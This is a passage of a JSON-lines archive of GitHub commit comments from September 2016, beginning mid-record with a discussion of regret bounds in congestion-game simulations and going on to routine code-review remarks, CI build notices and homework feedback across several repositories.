range [0.9, 1]. In such a game, the maximum regret wrt. any fixed strategy is trivially <= 0.1, so having an upper bound of 0.1 regret wouldn't really mean anything at all. If the costs were in the full range [0, 1], then expected regret <= 0.1 would be more meaningful, but I don't see how it translates to any concrete claims about the actual outcome distribution.\r\nI'm not sure if there is anything inherently bad about games that don't use the full range [0, 1]. We could take a congestion game and apply the bias combinator to shift costs upward by a fixed amount, and the game would still be the same wrt. PNE states. But, I guess an upper bound on expected regret would be devalued in some sense. Even our congestion games without applying a bias don't use the full normalized range since there are no zero-cost strategies (unless I'm mistaken).\r\nAnyway, I'm basically wondering if it may be possible to reason about more concrete properties of the equilibrium state reached by MWU dynamics by knowing some general properties of the cost functions along with the regret bound, and I wanted to make a tool for testing stuff that is faster and better than running the OCaml stuff with a shell script. Maybe this is all nonsense, or totally obvious, but being able to visualize outcome distributions or other things would at least be cool.\r\n\r\nBy doing it in C++, not only is the game simulation efficient and faster (uses multiple threads), but it is opened up to using the graphics stuff I've been working on. It can run multiple instances of the same game in parallel and average the data from all of them (maybe not appropriate for everything), and it all runs on background threads so the main thread is free to do rendering and handle user input while the game(s) are running. As each round is completed, the data for that round is appended to a structure that is accessible by the main thread. The idea is that you can step forward/backward rounds in the visualization and information for new rounds is added as it becomes available.\r\nRight now it's set up for congestion games with a variable number of players and resources. It's generalized so you can change the game by just plugging in an object that gives the cost function and strategy type, but I'm not sure if the current design would really be natural for other types of games. It might be easier to just write a new subclass of Game for each type of game and do it that way instead.\r\n\r\nSorry that this response is so long. Anyway, if there is something in particular that you would like to be able to visualize, I could probably have something workable by the 19th. There shouldn't really be anything that isn't possible."}},"created_at":"2016-09-07T22:10:33Z"}
{"id":"4530598496","type":"CommitCommentEvent","actor":{"login":"kirilg"},"repo":{"name":"pythonner/serving"},"payload":{"comment":{"id":18936773,"position":14,"line":59,"path":"tensorflow_serving/tools/docker/Dockerfile.devel","commit_id":"92a730a10fdd888a9483c05aa477cf9ad31d584a","created_at":"2016-09-07T22:11:05Z","updated_at":"2016-09-07T22:11:05Z","body":"I missed that you had this PR, but I already updated the BAZEL_VERSION to 0.3.0 (What TF uses) and added a WORKSPACE file check so that you get a useful error message right away.\r\n\r\nYou can revert that change, but keep the `mock` change above and we'll merge. Thanks!"}},"created_at":"2016-09-07T22:11:05Z"}
{"id":"4530598662","type":"CommitCommentEvent","actor":{"login":"andreymal"},"repo":{"name":"Orhideous/tabun"},"payload":{"comment":{"id":18936774,"position":12,"line":12,"path":"CONTRIBUTING.md","commit_id":"6d4135cefbbddd94524fc06ec38f3ca60cbf3c99","created_at":"2016-09-07T22:11:07Z","updated_at":"2016-09-07T22:11:07Z","body":"fitures"}},"created_at":"2016-09-07T22:11:07Z"}
{"id":"4530600395","type":"CommitCommentEvent","actor":{"login":"betelguiese"},"repo":{"name":"betelguiese/DS710GitTstPlanet"},"payload":{"comment":{"id":18936798,"position":null,"line":null,"path":null,"commit_id":"339eb711ead56f0f37653f80151857a0a8923a29","created_at":"2016-09-07T22:11:28Z","updated_at":"2016-09-07T22:11:28Z","body":"Test comment on 339eb71"}},"created_at":"2016-09-07T22:11:28Z"}
{"id":"4530607983","type":"CommitCommentEvent","actor":{"login":"chaosagent"},"repo":{"name":"EasyCTF/ctf-calendar"},"payload":{"comment":{"id":18936825,"position":18,"line":17,"path":"util.py","commit_id":"10c81c9311e1da10bd6cc62d5f3ad5914e4c00e7","created_at":"2016-09-07T22:13:07Z","updated_at":"2016-09-07T22:13:07Z","body":"use import redis and redis.from_url to keep things explicit"}},"created_at":"2016-09-07T22:13:07Z"}
{"id":"4530609850","type":"CommitCommentEvent","actor":{"login":"chaosagent"},"repo":{"name":"EasyCTF/ctf-calendar"},"payload":{"comment":{"id":18936831,"position":21,"line":20,"path":"util.py","commit_id":"10c81c9311e1da10bd6cc62d5f3ad5914e4c00e7","created_at":"2016-09-07T22:13:31Z","updated_at":"2016-09-07T22:13:31Z","body":"Newline before pass"}},"created_at":"2016-09-07T22:13:31Z"}
{"id":"4530612681","type":"CommitCommentEvent","actor":{"login":"tarantonio"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":18936835,"position":null,"line":null,"path":null,"commit_id":"0c21bc4bac87805a1f95c4d9c4a3b8a4ab5a890c","created_at":"2016-09-07T22:13:59Z","updated_at":"2016-09-07T22:13:59Z","body":"@peonso Couldn't be better. Thanks"}},"created_at":"2016-09-07T22:13:59Z"}
{"id":"4530612714","type":"CommitCommentEvent","actor":{"login":"jrevels"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18936836,"position":null,"line":null,"path":null,"commit_id":"8db40db6092e37d04160d80a6cd281a888a30e69","created_at":"2016-09-07T22:13:59Z","updated_at":"2016-09-07T22:13:59Z","body":"That pesky `getaddrinfo` error I've mentioned before took down the server again. It seems to regularly occur every couple of weeks...pretty disconcerting. Might just be a reoccurring CSAIL network problem though. Anyway, I've rebooted the server. \r\n\r\n@nanosoldier `runbenchmarks(ALL, vs = \"@2ab4a0d5aba0861f4f25d575192a22c95b12dec9\")`"}},"created_at":"2016-09-07T22:13:59Z"}
{"id":"4530613318","type":"CommitCommentEvent","actor":{"login":"shabesoglu"},"repo":{"name":"emweb/wt"},"payload":{"comment":{"id":18936839,"position":4,"line":4,"path":"src/js/ScrollVisibility.min.js","commit_id":"badb15137cc69fa976fa55d67808ca0f2de1a904","created_at":"2016-09-07T22:14:07Z","updated_at":"2016-09-07T22:14:07Z","body":"I got a compile error in this line column number 203 saying there needs to be a space before \"in\" for C++11."}},"created_at":"2016-09-07T22:14:07Z"}
{"id":"4530614837","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18936845,"position":null,"line":null,"path":null,"commit_id":"f44afc854de480f842c2e702bd237b9ba473e07c","created_at":"2016-09-07T22:14:27Z","updated_at":"2016-09-07T22:14:27Z","body":"@dktapps docs.itxtech.org is much faster in China."}},"created_at":"2016-09-07T22:14:27Z"}
{"id":"4530616681","type":"CommitCommentEvent","actor":{"login":"juancarlosfield"},"repo":{"name":"juancarlosfield/phase-0-tracks"},"payload":{"comment":{"id":18936853,"position":null,"line":null,"path":null,"commit_id":"083a041226296c9cb84ce07935f74768ee123f13","created_at":"2016-09-07T22:14:53Z","updated_at":"2016-09-07T22:14:53Z","body":"Dear Glenna, \r\nI am a disappointed at myself for not being able to understand the vowel part. I am already on the middle of week 6 and i need to start 6.1 asap. I am sorry i tried this solo many times in many ways.   "}},"created_at":"2016-09-07T22:14:53Z"}
{"id":"4530616773","type":"CommitCommentEvent","actor":{"login":"chaosagent"},"repo":{"name":"EasyCTF/ctf-calendar"},"payload":{"comment":{"id":18936854,"position":54,"line":53,"path":"util.py","commit_id":"10c81c9311e1da10bd6cc62d5f3ad5914e4c00e7","created_at":"2016-09-07T22:14:55Z","updated_at":"2016-09-07T22:14:55Z","body":"@wraps not update wrapper >.<"}},"created_at":"2016-09-07T22:14:55Z"}
{"id":"4530621897","type":"CommitCommentEvent","actor":{"login":"PeratX"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18936871,"position":null,"line":null,"path":null,"commit_id":"f44afc854de480f842c2e702bd237b9ba473e07c","created_at":"2016-09-07T22:16:02Z","updated_at":"2016-09-07T22:16:02Z","body":"These information should be in the ReadMe.md just like PocketMine-MP. Most people will view the ReadMe, not wiki."}},"created_at":"2016-09-07T22:16:02Z"}
{"id":"4530627530","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18936889,"position":null,"line":null,"path":null,"commit_id":"91260cfe0d4580ba37df79a67f8daf5d3fedcebf","created_at":"2016-09-07T22:17:18Z","updated_at":"2016-09-07T22:17:18Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 20](http://teamcity.otenv.com/viewLog.html?buildId=5181129&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-07T22:17:18Z"}
{"id":"4530632373","type":"CommitCommentEvent","actor":{"login":"JasonGross"},"repo":{"name":"mit-plv/fiat-crypto"},"payload":{"comment":{"id":18936902,"position":46,"line":76,"path":"src/Reflection/Reify.v","commit_id":"bb796b735c7804ebde4e843dfe980d8c9775d7ae","created_at":"2016-09-07T22:18:21Z","updated_at":"2016-09-07T22:18:21Z","body":"Quoting [the reference manual](https://coq.inria.fr/refman/Reference-Manual011.html#sec481):\r\n> It is also possible to redefine an existing user-defined tactic using the syntax:\r\n>\r\n> `Ltac qualid ident1 ... identn ::= expr`\r\n>\r\n> A previous definition of *qualid* must exist in the environment. The new definition will always be used instead of the old one and it goes accross [[sic]](https://github.com/coq/coq/pull/271) module boundaries."}},"created_at":"2016-09-07T22:18:21Z"}
{"id":"4530634417","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18936913,"position":null,"line":null,"path":null,"commit_id":"91260cfe0d4580ba37df79a67f8daf5d3fedcebf","created_at":"2016-09-07T22:18:49Z","updated_at":"2016-09-07T22:18:49Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 20](http://teamcity.otenv.com/viewLog.html?buildId=5181129&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 14 Build time: 00:01:31"}},"created_at":"2016-09-07T22:18:49Z"}
{"id":"4530637180","type":"CommitCommentEvent","actor":{"login":"Manticmage"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":18936920,"position":4,"line":127,"path":"src/map/enmity_container.cpp","commit_id":"d3fee59d0d47d57760db06b9d277d50fb7d65ee6","created_at":"2016-09-07T22:19:26Z","updated_at":"2016-09-07T22:19:26Z","body":"@takhlaq This fix seems to have created this issue: #3002 When lines 127-129 are commented out the issues described in #3002 are no longer present (Outside heals means no EXP for the Party/Solo Player)."}},"created_at":"2016-09-07T22:19:26Z"}
{"id":"4530639664","type":"CommitCommentEvent","actor":{"login":"rickynils"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18936928,"position":null,"line":null,"path":null,"commit_id":"dd98b6fb9f35544201ed66733af40ff822ba8c36","created_at":"2016-09-07T22:20:02Z","updated_at":"2016-09-07T22:20:02Z","body":"So, this broke my NixOS LXC containers again. This is what happens for me:\r\n\r\n1. stage2 runs, without mounting `/run` etc\r\n2. activation script runs, and in the end the symlinks `/run/current-system` etc are set up\r\n3. systemd starts, and its `mount-setup.c` sets up any missing mountpoints. Since `/run` is not mounted, it mounts a tmpfs over the existing `/run`, hiding all previous stuff there (`/run/current-system`, for example)\r\n4. the services starts and, most notably, dbus fails to start since it can't find `system.conf` that it looks for somewhere under `/run/current-system`.\r\n\r\nSo I don't actually end up with a completely broken system, but one where dbus, systemd-login and some other services don't run.\r\n\r\nThere's a couple of different ways to solve this. Either we come up with a way to let stage2 setup the mountpoints that works for both systemd-nspawn and LXC, or I try to get LXC to set up `/run` as a mountpoint pre-stage2."}},"created_at":"2016-09-07T22:20:02Z"}
{"id":"4530645239","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18936937,"position":74,"line":144,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:21:19Z","updated_at":"2016-09-07T22:21:19Z","body":"Wait, the test that failed with a 404 now returns correct data. Could it be a token / authorization / we-didnt-have-this-yesterday issue?\r\n\r\nWorks, great!"}},"created_at":"2016-09-07T22:21:19Z"}
{"id":"4530650368","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18936954,"position":55,"line":114,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:22:28Z","updated_at":"2016-09-07T22:22:28Z","body":"Awesome! Adding this to my list"}},"created_at":"2016-09-07T22:22:28Z"}
{"id":"4530654174","type":"CommitCommentEvent","actor":{"login":"faddat"},"repo":{"name":"asalei/gocryptotrader"},"payload":{"comment":{"id":18936963,"position":null,"line":null,"path":null,"commit_id":"fd1ac9afc53dcb741c65b2df047213b985c6d1c3","created_at":"2016-09-07T22:23:19Z","updated_at":"2016-09-07T22:23:19Z","body":"Is this what's causing it to explode?"}},"created_at":"2016-09-07T22:23:19Z"}
{"id":"4530655511","type":"CommitCommentEvent","actor":{"login":"faddat"},"repo":{"name":"asalei/gocryptotrader"},"payload":{"comment":{"id":18936967,"position":null,"line":null,"path":null,"commit_id":"fd1ac9afc53dcb741c65b2df047213b985c6d1c3","created_at":"2016-09-07T22:23:39Z","updated_at":"2016-09-07T22:23:39Z","body":"also, faddat@gmail.com :)"}},"created_at":"2016-09-07T22:23:39Z"}
{"id":"4530656870","type":"CommitCommentEvent","actor":{"login":"gianlucaborello"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18936975,"position":74,"line":144,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:23:55Z","updated_at":"2016-09-07T22:23:55Z","body":"I am tempted to say no, I tried the same example just a few minutes after you reported it yesterday and it was working (but I was on my way out so I waited until today to do more careful testing before answering you). Don't hesitate to report other issues!"}},"created_at":"2016-09-07T22:23:55Z"}
{"id":"4530663477","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18936990,"position":61,"line":225,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-07T22:25:24Z","updated_at":"2016-09-07T22:25:24Z","body":"Tried fade. Works faster. Edited the file in GIT."}},"created_at":"2016-09-07T22:25:24Z"}
{"id":"4530664823","type":"CommitCommentEvent","actor":{"login":"rimutaka"},"repo":{"name":"hubsy-io/timelapse"},"payload":{"comment":{"id":18936991,"position":74,"line":238,"path":"README.md","commit_id":"6cdabc48ff36826f18d5c106abeabedada461dc0","created_at":"2016-09-07T22:25:43Z","updated_at":"2016-09-07T22:25:43Z","body":"Edited readme to explain better."}},"created_at":"2016-09-07T22:25:43Z"}
{"id":"4530667419","type":"CommitCommentEvent","actor":{"login":"dsikkema"},"repo":{"name":"feels-app/feels-android"},"payload":{"comment":{"id":18937004,"position":null,"line":null,"path":null,"commit_id":"ffe95ff84eee4803efcfcfd26cb045ecb05c3192","created_at":"2016-09-07T22:26:18Z","updated_at":"2016-09-07T22:26:18Z","body":"looks great"}},"created_at":"2016-09-07T22:26:18Z"}
{"id":"4530672133","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18937019,"position":39,"line":520,"path":"payment/src/main/java/org/killbill/billing/payment/core/PaymentProcessor.java","commit_id":"43550c3ff7454265054c68c202e5b5fcd79c5d75","created_at":"2016-09-07T22:27:29Z","updated_at":"2016-09-07T22:27:29Z","body":"No worries 😸 \r\n\r\nSee https://github.com/killbill/killbill/commit/2dbe3bd6d406f5816235e2465c64e1effc9f405c to remove the extra `if`."}},"created_at":"2016-09-07T22:27:29Z"}
{"id":"4530677272","type":"CommitCommentEvent","actor":{"login":"majacaci00"},"repo":{"name":"bishopkd/DSI-SF2-bishopkd"},"payload":{"comment":{"id":18937037,"position":null,"line":null,"path":null,"commit_id":"beb21d93c5d89228749a7d5d5eb4b963a6c212d4","created_at":"2016-09-07T22:28:44Z","updated_at":"2016-09-07T22:28:44Z","body":"Q1. Nice work, good use of pivot tables, your correlation heat map is not readable (consider increasing the size of your graphs). Your X matrix has only 11 predictors; it could have used more predictors (merging datasets) to see how Ridge or Lasso works.\t\r\n\r\nQ2. Great work, however, it would have been helpful to compare the same words/expressions that appear in both datasets (service non-service)\t\r\n\r\nQ3. Your code shows a great understanding of classification and grid search. \t\r\n\r\nQ4. See solutions\t\r\n\r\nQ5. See solutions\t\r\n\r\nSummary\r\nOverall great work, your code shows understanding of classification methods, make sure you evaluate your classifier (accuracy score) using the confusion matrix. Revise the solutions for ROC implementation."}},"created_at":"2016-09-07T22:28:44Z"}
{"id":"4530677445","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937038,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:28:46Z","updated_at":"2016-09-07T22:28:46Z","body":"What. This is working now as well.  🔨"}},"created_at":"2016-09-07T22:28:46Z"}
{"id":"4530681826","type":"CommitCommentEvent","actor":{"login":"knewter"},"repo":{"name":"rudolfb/time-tracker"},"payload":{"comment":{"id":18937052,"position":null,"line":null,"path":null,"commit_id":"6adb97623354d6194c8970f6289a656c78761306","created_at":"2016-09-07T22:29:51Z","updated_at":"2016-09-07T22:29:51Z","body":"Neat! I'm introducing some abstraction around the forms with elm-simple-form in the next couple of dailydrip episodes (along with API error handling) - likely recording and releasing both tomorrow - and it would be super neat to build this into that abstraction going forward so the whole 'duplicate this effort for every form' part just kind of comes for free :)"}},"created_at":"2016-09-07T22:29:51Z"}
{"id":"4530682423","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937057,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:30:01Z","updated_at":"2016-09-07T22:30:01Z","body":"btw, I have four agents online and this is returning an array (agents) with a length of 5?"}},"created_at":"2016-09-07T22:30:01Z"}
{"id":"4530685408","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"lodash/lodash.github.io"},"payload":{"comment":{"id":18937062,"position":null,"line":null,"path":null,"commit_id":"4273000319dbc33236cb4b314c61efe815b8e94f","created_at":"2016-09-07T22:30:44Z","updated_at":"2016-09-07T22:30:44Z","body":"Should these `px`'s be `rem`s?\r\n"}},"created_at":"2016-09-07T22:30:44Z"}
{"id":"4530690598","type":"CommitCommentEvent","actor":{"login":"stinoga"},"repo":{"name":"JedWatson/react-select"},"payload":{"comment":{"id":18937069,"position":null,"line":null,"path":null,"commit_id":"7fe723f1195d4dd5012ffb7f5c6b4b383daf5172","created_at":"2016-09-07T22:32:00Z","updated_at":"2016-09-07T22:32:00Z","body":"@bvaughn This is awesome! Can you use this with `async`? What's the best way to pull the options from a REST api?"}},"created_at":"2016-09-07T22:32:00Z"}
{"id":"4530692514","type":"CommitCommentEvent","actor":{"login":"tonyandrewmeyer"},"repo":{"name":"SpamExperts/trac-slack"},"payload":{"comment":{"id":18937074,"position":129,"line":129,"path":"application.py","commit_id":"4dc8ec384980dfe22865ef29510d7053b98b0a37","created_at":"2016-09-07T22:32:28Z","updated_at":"2016-09-07T22:32:28Z","body":"Is there a reason you don't just use cgi.escape?"}},"created_at":"2016-09-07T22:32:28Z"}
{"id":"4530692674","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937075,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:32:30Z","updated_at":"2016-09-07T22:32:30Z","body":"Try using sendkeys, that should work, send a certain amount of tabs until your cursor is over a certain option. (Are you on the school computers?)"}},"created_at":"2016-09-07T22:32:30Z"}
{"id":"4530695696","type":"CommitCommentEvent","actor":{"login":"majacaci00"},"repo":{"name":"angnicolas/DSI-SF-2-nick"},"payload":{"comment":{"id":18937081,"position":null,"line":null,"path":null,"commit_id":"25da0db4c80edafcd2ef236918a063237fb7294e","created_at":"2016-09-07T22:33:13Z","updated_at":"2016-09-07T22:33:13Z","body":"Q1. It looks like you failed to classify the city(ies) as Vegas or not. Get in the habit of printing the accuracy of your model (that is how you evaluate a classifier). Also, your  ROC curve shows that your model performs poorly. You failed on providing a write up \"profile\" for your classification.\t\r\n\r\nQ2. Your Y variable is not a continues variable, can't use linear regression, therefore your analysis is incorrect. Check the class notes for when to use linear regression or classification.\t\r\n\r\nQ3. Your answer to this question is better, and you are using classification methods (logistic regression, knn), which is what you are supposed to do. Don't forget to print your baseline, and explain if the logistic regression performs better than Knn or vice-versa? \t\r\n\r\nQ4. See solutions\t\r\n\r\nQ5. See solutions\t\r\n\r\nSummary\r\nYour code is all over the place and hard to keep track what are you trying to accomplish. Add notes to your code, explain what are you trying to do (don't assume that people will understand your code, always, always provide an explanation). You don't seem to be clear on when to use a linear regression or classification method (ask us if you need extra help). Remember that you evaluate your classifier by the accuracy, Spend some time reading/going over class code notes"}},"created_at":"2016-09-07T22:33:13Z"}
{"id":"4530696801","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937084,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:33:29Z","updated_at":"2016-09-07T22:33:29Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T22:33:29Z"}
{"id":"4530697245","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937085,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:33:36Z","updated_at":"2016-09-07T22:33:36Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T22:33:36Z"}
{"id":"4530697404","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937087,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:33:38Z","updated_at":"2016-09-07T22:33:38Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T22:33:38Z"}
{"id":"4530697482","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937088,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:33:39Z","updated_at":"2016-09-07T22:33:39Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T22:33:39Z"}
{"id":"4530699400","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937096,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:34:07Z","updated_at":"2016-09-07T22:34:07Z","body":"@JoinRajuncraftNow, HEY"}},"created_at":"2016-09-07T22:34:07Z"}
{"id":"4530700206","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937102,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:34:18Z","updated_at":"2016-09-07T22:34:18Z","body":"@JoinRajuncraftNow UPLOAD IT!"}},"created_at":"2016-09-07T22:34:18Z"}
{"id":"4530700743","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18937106,"position":null,"line":null,"path":null,"commit_id":"d12e45dc32a182ff6bdd52507f7cc5aa5fb6185c","created_at":"2016-09-07T22:34:27Z","updated_at":"2016-09-07T22:34:27Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 21](http://teamcity.otenv.com/viewLog.html?buildId=5181193&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-07T22:34:27Z"}
{"id":"4530704118","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937120,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:35:16Z","updated_at":"2016-09-07T22:35:16Z","body":"I could finish this... (I got pretty darn close), but video games are calling.\r\nCya tomorrow!"}},"created_at":"2016-09-07T22:35:16Z"}
{"id":"4530705104","type":"CommitCommentEvent","actor":{"login":"cchantep"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":18937122,"position":7,"line":0,"path":"framework/src/play/src/main/scala/play/api/data/validation/Validation.scala","commit_id":"3be763dafc858d40ac9205baef12a9de91cbb3fe","created_at":"2016-09-07T22:35:30Z","updated_at":"2016-09-07T22:35:30Z","body":"I don't think this will appear when the Scaladoc define is used, as not on the same line"}},"created_at":"2016-09-07T22:35:30Z"}
{"id":"4530705539","type":"CommitCommentEvent","actor":{"login":"gianlucaborello"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937125,"position":83,"line":168,"path":"sdcclient.py","commit_id":"95cb6ec1fda4583367d4cf6208f18511241a7106","created_at":"2016-09-07T22:35:37Z","updated_at":"2016-09-07T22:35:37Z","body":"`get_data_retention_info` is not related to the number of connected agents (those would show up in the `get_connected_agents` method or in a proper data request). What you are seeing there is a table that shows you the data retention information for different sampling times. It's meant as an index that you can use to know how far back in time you can ask agent data and with what granularity (fields `sampling`, `from` and `to`). A good explanation is at https://support.sysdigcloud.com/hc/en-us/articles/204889655-Time-Control under \"Data Retention Policy\"."}},"created_at":"2016-09-07T22:35:37Z"}
{"id":"4530705615","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18937126,"position":27,"line":194,"path":"sdcclient.py","commit_id":"9ae8b47807349d0ccb5adf911b309fd105f34226","created_at":"2016-09-07T22:35:39Z","updated_at":"2016-09-07T22:35:39Z","body":"Will this potentially be added again? Or can I keep this out of my client?"}},"created_at":"2016-09-07T22:35:39Z"}
{"id":"4530705697","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937127,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:35:40Z","updated_at":"2016-09-07T22:35:40Z","body":"Upload it! I'll finish it! I'll even use MY WINDOWS PERSONAL COMPUTER!"}},"created_at":"2016-09-07T22:35:40Z"}
{"id":"4530706343","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937129,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:35:49Z","updated_at":"2016-09-07T22:35:49Z","body":"PLZ, UPLOAD IT!"}},"created_at":"2016-09-07T22:35:49Z"}
{"id":"4530706348","type":"CommitCommentEvent","actor":{"login":"majacaci00"},"repo":{"name":"GitPaulM/DSI-SF-2-GitPaulM"},"payload":{"comment":{"id":18937130,"position":null,"line":null,"path":null,"commit_id":"1951d787e40a4dddf583a38d67a5e9bd052e585a","created_at":"2016-09-07T22:35:50Z","updated_at":"2016-09-07T22:35:50Z","body":"Q1. Paul, this is a superb analysis. Great work building up the models using grid search, comparing them against baselines, and evaluating their performance using the confusion matrix/accuracy. Good job Paul!!\r\n\r\nQ2. \tGreat work, really like the last data frame (line 34) showing up the variables and coefficients.\r\n\r\nQ3. Great work Paul\t\r\n\r\nQ4. See solutions\t\r\n\r\nQ5. See solutions\t\r\n\r\n\r\nSummary\r\nYour code is organized, and it shows understanding of the classification methods, grid search. I like how you evaluate the performance of your model using the confusion matrix and by comparing the results from the models, (going from basic to more complex). Include more graphs in your analysis (try to graph the ROC curve). Finally, get into the habit of writing your results in plain Ingles/English Good job overall"}},"created_at":"2016-09-07T22:35:50Z"}
{"id":"4530706559","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18937131,"position":null,"line":null,"path":null,"commit_id":"0a4f9585a65b7e52201853e616a7bb8e9f47a09c","created_at":"2016-09-07T22:35:53Z","updated_at":"2016-09-07T22:35:53Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 21](http://teamcity.otenv.com/viewLog.html?buildId=5181193&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **SUCCESS**\nSummary: Tests passed: 5 Build time: 00:01:25"}},"created_at":"2016-09-07T22:35:53Z"}
{"id":"4530707114","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18937133,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T22:36:01Z","updated_at":"2016-09-07T22:36:01Z","body":"Lol\r\nI was testing it on a neocities dupe I made."}},"created_at":"2016-09-07T22:36:01Z"}
